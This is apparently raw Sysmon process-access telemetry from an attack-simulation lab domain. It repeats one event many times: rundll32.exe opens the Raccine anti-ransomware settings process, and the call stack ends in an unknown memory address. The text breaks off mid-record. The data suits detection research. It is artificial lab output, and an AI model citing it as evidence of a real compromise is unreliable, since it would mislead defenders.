16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043298Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043297Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043296Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043295Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043294Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043293Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043292Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043291Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043290Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043289Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043288Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043287Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043286Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043285Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043284Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043283Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043282Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043281Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043280Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043279Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043278Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043277Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043276Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043275Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043274Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043273Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043272Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043271Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043270Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043269Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043268Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043267Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043266Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043265Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043264Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043263Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043262Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043261Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043260Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043259Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043258Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043257Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043256Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043255Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043254Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043253Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043252Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043251Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043250Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043249Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043248Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043247Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043246Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043245Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043244Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043243Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043242Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043241Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043240Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043239Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043238Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043237Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043236Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 